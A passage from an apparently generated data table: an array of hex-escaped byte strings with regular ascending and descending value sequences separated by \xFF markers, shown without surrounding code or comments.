4\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF","\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46","\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47","\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF","\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B","\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D","\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70","\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71","\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73","\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF","\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56","\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57","\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF","\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B","\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D","\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF","\x5F\x7F\x16\x29\x60\x16\x2A\x61\x16\x2B\x62\x16\x2C\x63\x16\x2D","\x64\x16\x2E\x65\x16\x2F\x66\x16\x30\x67\x16\x31\x68\x16\x32\x69","\x16\x33\x6A\x16\x34\x6B\x16\x35\x6C\x16\x36\x6D\x16\x37\x6E\x16","\x38\x6F\x16\x39\x70\x16\x3A\x71\x16\x3B\x72\x16\x3C\x73\x16\x3D","\x74\x16\x3E\x75\x16\x3F\x76\xFF\x56\x16\x17\x28\x60\x17\x29\x61","\x17\x2A\x62\x17\x2B\x63\x17\x2C\x64\x17\x2D\x65\x17\x2E\x66\x17","\x2F\x67\x17\x30\x68\x17\x31\x69\x17\x32\x6A\x17\x33\x6B\x17\x34","\x6C\x17\x35\x6D\x17\x36\x6E\x17\x37\x6F\x17\x38\x70\x17\x39\x71","\x17\x3A\x72\x17\x3B\x73\x17\x3C\x74\x17\x3D\x75\x17\x3E\x76\x17","\x3F\x77\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E","\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D","\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF","\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF\x78","\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57\x77","\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76\x76","\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF\x73","\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71\x51","\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70\xFF","\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E","\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D","\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF","\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF\x68","\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47\x67","\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66\x66","\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF\x63","\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61\x41","\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61\xFF","\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64\x43","\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65\x44","\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67\xFF","\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF\x68","\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A","\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D","\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E","\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70","\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71\xFF","\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74\x53","\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75\x54","\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77\xFF","\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF\x78","\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A","\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D","\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E","\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x17\x28\x60","\x17\x29\x61\x17\x2A\x62\x17\x2B\x63\x17\x2C\x64\x17\x2D\x65\x17","\x2E\x66\x17\x2F\x67\x17\x30\x68\x17\x31\x69\x17\x32\x6A\x17\x33","\x6B\x17\x34\x6C\x17\x35\x6D\x17\x36\x6E\x17\x37\x6F\x17\x38\x70","\x17\x39\x71\x17\x3A\x72\x17\x3B\x73\x17\x3C\x74\x17\x3D\x75\x17","\x3E\x76\x17\x3F\x77\xFF\x57\x17\x18\x27\x60\x18\x28\x61\x18\x29","\x62\x18\x2A\x63\x18\x2B\x64\x18\x2C\x65\x18\x2D\x66\x18\x2E\x67","\x18\x2F\x68\x18\x30\x69\x18\x31\x6A\x18\x32\x6B\x18\x33\x6C\x18","\x34\x6D\x18\x35\x6E\x18\x36\x6F\x18\x37\x70\x18\x38\x71\x18\x39","\x72\x18\x3A\x73\x18\x3B\x74\x18\x3C\x75\x18\x3D\x76\x18\x3E\x77","\x18\x3F\x78\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF","\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57","\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76","\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF","\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71","\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70","\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F","\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C","\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A","\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF","\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47","\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66","\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF","\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61","\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61","\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64","\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65","\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67","\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF","\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A","\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B","\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF","\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F","\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71","\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74","\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75","\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77","\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF","\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A","\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B","\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF","\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x18\x27","\x60\x18\x28\x61\x18\x29\x62\x18\x2A\x63\x18\x2B\x64\x18\x2C\x65","\x18\x2D\x66\x18\x2E\x67\x18\x2F\x68\x18\x30\x69\x18\x31\x6A\x18","\x32\x6B\x18\x33\x6C\x18\x34\x6D\x18\x35\x6E\x18\x36\x6F\x18\x37","\x70\x18\x38\x71\x18\x39\x72\x18\x3A\x73\x18\x3B\x74\x18\x3C\x75","\x18\x3D\x76\x18\x3E\x77\x18\x3F\x78\xFF\x58\x18\x19\x26\x60\x19","\x27\x61\x19\x28\x62\x19\x29\x63\x19\x2A\x64\x19\x2B\x65\x19\x2C","\x66\x19\x2D\x67\x19\x2E\x68\x19\x2F\x69\x19\x30\x6A\x19\x31\x6B","\x19\x32\x6C\x19\x33\x6D\x19\x34\x6E\x19\x35\x6F\x19\x36\x70\x19","\x37\x71\x19\x38\x72\x19\x39\x73\x19\x3A\x74\x19\x3B\x75\x19\x3C","\x76\x19\x3D\x77\x19\x3E\x78\x19\x3F\x79\xFF\x7F\x5F\xFF\x5F\x7F","\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E","\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B","\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59","\xFF\x79\x7A\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF","\x77\x57\xFF\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56","\x76\xFF\x75\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75","\x75\x54\x74\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF","\x72\x73\x73\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70","\x50\xFF\x70\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F","\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E","\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B","\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49","\xFF\x69\x6A\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF","\x67\x47\xFF\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46","\x66\xFF\x65\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65","\x65\x44\x64\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF","\x62\x63\x63\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60","\x40\xFF\x61\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62","\xFF\x62\x63\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65","\x44\x64\xFF\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66","\x45\x67\x46\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68","\xFF\x68\x47\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF","\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B","\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C","\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF","\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70","\x71\xFF\x71\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72","\xFF\x72\x73\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75","\x54\x74\xFF\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76","\x55\x77\x56\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78","\xFF\x78\x57\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF","\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B","\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C","\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF","\x7F\x5E\xFF\x5F\x7F\x19\x26\x60\x19\x27\x61\x19\x28\x62\x19\x29","\x63\x19\x2A\x64\x19\x2B\x65\x19\x2C\x66\x19\x2D\x67\x19\x2E\x68","\x19\x2F\x69\x19\x30\x6A\x19\x31\x6B\x19\x32\x6C\x19\x33\x6D\x19","\x34\x6E\x19\x35\x6F\x19\x36\x70\x19\x37\x71\x19\x38\x72\x19\x39","\x73\x19\x3A\x74\x19\x3B\x75\x19\x3C\x76\x19\x3D\x77\x19\x3E\x78","\x19\x3F\x79\xFF\x59\x19\x1A\x25\x60\x1A\x26\x61\x1A\x27\x62\x1A","\x28\x63\x1A\x29\x64\x1A\x2A\x65\x1A\x2B\x66\x1A\x2C\x67\x1A\x2D","\x68\x1A\x2E\x69\x1A\x2F\x6A\x1A\x30\x6B\x1A\x31\x6C\x1A\x32\x6D","\x1A\x33\x6E\x1A\x34\x6F\x1A\x35\x70\x1A\x36\x71\x1A\x37\x72\x1A","\x38\x73\x1A\x39\x74\x1A\x3A\x75\x1A\x3B\x76\x1A\x3C\x77\x1A\x3D","\x78\x1A\x3E\x79\x1A\x3F\x7A\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E","\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF","\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B","\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A","\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF","\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75","\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74","\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73","\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70","\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E","\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF","\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B","\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A","\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF","\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65","\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64","\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63","\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61","\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63","\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF","\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46","\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47","\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF","\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B","\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D","\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70","\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71","\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73","\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF","\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56","\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57","\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF","\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B","\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D","\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF","\x5F\x7F\x1A\x25\x60\x1A\x26\x61\x1A\x27\x62\x1A\x28\x63\x1A\x29","\x64\x1A\x2A\x65\x1A\x2B\x66\x1A\x2C\x67\x1A\x2D\x68\x1A\x2E\x69","\x1A\x2F\x6A\x1A\x30\x6B\x1A\x31\x6C\x1A\x32\x6D\x1A\x33\x6E\x1A","\x34\x6F\x1A\x35\x70\x1A\x36\x71\x1A\x37\x72\x1A\x38\x73\x1A\x39","\x74\x1A\x3A\x75\x1A\x3B\x76\x1A\x3C\x77\x1A\x3D\x78\x1A\x3E\x79","\x1A\x3F\x7A\xFF\x5A\x1A\x1B\x24\x60\x1B\x25\x61\x1B\x26\x62\x1B","\x27\x63\x1B\x28\x64\x1B\x29\x65\x1B\x2A\x66\x1B\x2B\x67\x1B\x2C","\x68\x1B\x2D\x69\x1B\x2E\x6A\x1B\x2F\x6B\x1B\x30\x6C\x1B\x31\x6D","\x1B\x32\x6E\x1B\x33\x6F\x1B\x34\x70\x1B\x35\x71\x1B\x36\x72\x1B","\x37\x73\x1B\x38\x74\x1B\x39\x75\x1B\x3A\x76\x1B\x3B\x77\x1B\x3C","\x78\x1B\x3D\x79\x1B\x3E\x7A\x1B\x3F\x7B\xFF\x7F\x5F\xFF\x5F\x7F","\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E","\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B","\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59","\xFF\x79\x7A\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF","\x77\x57\xFF\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56","\x76\xFF\x75\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75","\x75\x54\x74\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF","\x72\x73\x73\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70","\x50\xFF\x70\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F","\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E","\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B","\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49","\xFF\x69\x6A\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF","\x67\x47\xFF\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46","\x66\xFF\x65\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65","\x65\x44\x64\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF","\x62\x63\x63\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60","\x40\xFF\x61\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62","\xFF\x62\x63\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65","\x44\x64\xFF\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66","\x45\x67\x46\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68","\xFF\x68\x47\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF","\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B","\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C","\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF","\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70","\x71\xFF\x71\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72","\xFF\x72\x73\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75","\x54\x74\xFF\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76","\x55\x77\x56\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78","\xFF\x78\x57\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF","\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B","\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C","\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF","\x7F\x5E\xFF\x5F\x7F\x1B\x24\x60\x1B\x25\x61\x1B\x26\x62\x1B\x27","\x63\x1B\x28\x64\x1B\x29\x65\x1B\x2A\x66\x1B\x2B\x67\x1B\x2C\x68","\x1B\x2D\x69\x1B\x2E\x6A\x1B\x2F\x6B\x1B\x30\x6C\x1B\x31\x6D\x1B","\x32\x6E\x1B\x33\x6F\x1B\x34\x70\x1B\x35\x71\x1B\x36\x72\x1B\x37","\x73\x1B\x38\x74\x1B\x39\x75\x1B\x3A\x76\x1B\x3B\x77\x1B\x3C\x78","\x1B\x3D\x79\x1B\x3E\x7A\x1B\x3F\x7B\xFF\x5B\x1B\x1C\x23\x60\x1C","\x24\x61\x1C\x25\x62\x1C\x26\x63\x1C\x27\x64\x1C\x28\x65\x1C\x29","\x66\x1C\x2A\x67\x1C\x2B\x68\x1C\x2C\x69\x1C\x2D\x6A\x1C\x2E\x6B","\x1C\x2F\x6C\x1C\x30\x6D\x1C\x31\x6E\x1C\x32\x6F\x1C\x33\x70\x1C","\x34\x71\x1C\x35\x72\x1C\x36\x73\x1C\x37\x74\x1C\x38\x75\x1C\x39","\x76\x1C\x3A\x77\x1C\x3B\x78\x1C\x3C\x79\x1C\x3D\x7A\x1C\x3E\x7B","\x1C\x3F\x7C\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF","\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57","\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76","\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF","\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71","\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70","\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F","\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C","\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A","\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF","\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47","\x67\xFF\x66\x46\xFF\x66\x67\x67\x